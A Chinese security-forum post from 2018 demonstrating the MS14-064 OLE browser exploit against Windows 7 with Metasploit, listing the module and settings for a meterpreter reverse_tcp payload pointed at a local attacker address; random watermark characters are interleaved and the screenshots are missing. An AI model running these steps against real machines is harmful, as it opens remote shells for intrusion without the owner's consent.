找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1758|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ Y) I. B% P! A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ S( x! m7 ]) s! ?) d7 G

3 E+ f* \5 j) ]- U) ^7 f" \1 _

% }& z5 K' F& `& l4 s 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 8 z) ]& L$ @0 ]" Z$ a, `

% g1 P: @0 \, e

# E) t; J4 |% r+ g! i 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 8 W' |& f2 q O* m! ^9 }- X; \

# x4 A$ I6 P4 i: f r

3 i$ [. E8 @$ V/ w8 s             set AllowPowershellPrompt true+ c' S1 |5 O8 T$ g9 }

7 Q+ p* h$ C( s6 \; {% ^3 H

6 j w. j% ^- T: s7 l- d: F             Set LHOST 192.168.0.109 + Y1 b# H3 ]1 i, g" k4 [+ i

+ v& r8 ^2 m+ D: I

7 a. ?$ a: c/ ^5 |. m2 P! ?& t6 [             set SRVHOST 192.168.0.1092 U5 ~5 C% @; i* o7 |; [* w

) d( E* }1 u6 e+ @& Z! ~

4 d& I% j6 u. i. y             Set uripath share* ^% {5 t3 `$ t' M1 L/ v

2 S- x6 I0 E! U! [$ Z c

6 B/ ]* e2 z& o             Set srvport 80# `( m6 p2 z8 N8 y u

8 h6 H! K+ o; j& o, O3 f

U4 q/ ]# F" \. N$ |  ; t3 f3 L g+ A% {, \' M

" I9 K* j$ x; p% p: Q

- P4 G8 Q0 F. R   , n: s; l' l! Y9 r7 D

2 _+ p) U4 L. W4 o

; S) g& X- p" J. h! p: P- E7 F  " [% V2 o- C6 ?) f

8 y) ]. N$ s6 k; I. e% b

( B) n+ K4 y8 V x) U  * u7 _& Q+ ~: A) L+ a# \. _

8 G0 e' |3 t# E6 i! l

; X, ~& p' M; F. U% H  / x( W, I1 g& }1 F: p- C

6 n0 _. l. F h; J" y) s6 y

# G- D4 e, F+ K2 \9 F6 m 下面我们来访问本地地址如图:/ Z T: _" ^. S/ B. p; ~; ^

$ D' J. S. @% R+ G( [# s- h4 s* Z

2 d [ v; U* a M; F   3 P) s. m" ^! L$ n1 n" R( W

; h' G( f8 S" Y8 ?) s+ K' v

& J& b' e$ G9 c2 L   * b, b. y2 b l, c9 U0 e

* M& i% {1 b: w

, q$ j" w& M D M' a 7 o1 Q7 V2 n! |) [ {4 l

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表